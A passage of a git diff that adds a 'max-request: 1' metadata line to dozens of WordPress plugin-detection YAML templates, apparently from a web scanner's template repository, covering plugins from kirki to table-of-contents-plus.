a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 8e1cb46cf0..8881e23860 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index c45ef4bf89..0bc823830f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/photo-gallery.yaml b/http/technologies/wordpress/plugins/photo-gallery.yaml index a224d85727..7fbeea5917 100644 --- a/http/technologies/wordpress/plugins/photo-gallery.yaml +++ b/http/technologies/wordpress/plugins/photo-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/photo-gallery/ metadata: + max-request: 1 plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 56d2e4efcd..829edad042 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 656ad7dfe5..648ee176ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: 